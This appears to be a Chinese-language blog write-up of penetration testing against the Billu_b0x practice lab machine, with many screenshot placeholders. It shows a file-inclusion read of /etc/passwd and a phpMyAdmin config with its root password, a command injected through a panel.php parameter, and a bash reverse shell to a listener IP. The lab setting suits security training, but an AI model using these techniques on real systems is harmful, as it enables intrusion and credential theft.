靶机-Billu_b0x root 123456

查找靶机IP
靶机-Billu_b0x root 123456_第1张图片
nmap查看开放端口22,80
靶机-Billu_b0x root 123456_第2张图片
目录扫描
靶机-Billu_b0x root 123456_第3张图片

查看网站,典型注入
靶机-Billu_b0x root 123456_第4张图片

phpmy

果然是登陆界面,不过不知道账户及密码
靶机-Billu_b0x root 123456_第5张图片

in.php

php的配置信息,可以看看
靶机-Billu_b0x root 123456_第6张图片

add.php

上传文件目录,可以上传,不过没有回显

其他页面

show.php和c.php访问页面空白

文件目录

/uploaded_images/
果然如此,刚才上传失败了
靶机-Billu_b0x root 123456_第7张图片

文件包含漏洞

访问test.php
靶机-Billu_b0x root 123456_第8张图片
得到以下界面
翻译结果:“file”参数为空。请在“file”参数中提供文件路径
需要一个参数,可能存在文件包含漏洞
POST方法成功注入
靶机-Billu_b0x root 123456_第9张图片
最后一个id 1000为ica的也有ssh连接权限


下载其他文件
asswd可以下载,shadow无法下载。前面说过有phpmyadmin,可以下载以下它的配置文件
file=/var/www/phpmy/config.inc.php
靶机-Billu_b0x root 123456_第10张图片
里面有用户名和密码
$cfg’Servers’[‘user’] = ‘root’;
$cfg’Servers’[‘password’] = ‘roottoor’;
ssh直接登录

回到网站,使用burp模糊注入测试
靶机-Billu_b0x root 123456_第11张图片

靶机-Billu_b0x root 123456_第12张图片
跳转到
靶机-Billu_b0x root 123456_第13张图片
利用kali上shell
靶机-Billu_b0x root 123456_第14张图片
需要修改 反弹代理 里面 ip
靶机-Billu_b0x root 123456_第15张图片
靶机-Billu_b0x root 123456_第16张图片
上传成功
靶机-Billu_b0x root 123456_第17张图片
访问之前的图片路径
靶机-Billu_b0x root 123456_第18张图片
靶机-Billu_b0x root 123456_第19张图片
靶机-Billu_b0x root 123456_第20张图片
查看权限
靶机-Billu_b0x root 123456_第21张图片
提权
内核漏洞提权
python -c ‘import pty;pty.spawn(’/bin/bash’)’
uname -a

查找内核漏洞
靶机-Billu_b0x root 123456_第22张图片
放到www目录下,开启apache服务
service apache2 start
靶机-Billu_b0x root 123456_第23张图片

网页显示上传失败。换一种思路,上传一张正常图片并在burp中抓包,在图片末尾加入
接下来还是使用burp,在URL的post请求中加入POST /panel.php?cmd=cat%20/etc/passwd;ls,正文中加入load=/uploaded_images/apple233.png&continue=continue
靶机-Billu_b0x root 123456_第24张图片
kali命令行里输入nc -lvnp 9999开始监听,同时burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.253.136/99990>&1” | bash,注意要将此命令先经过URL编码才能发送

你可能感兴趣的:(靶机,网络,安全,靶机,渗透测试)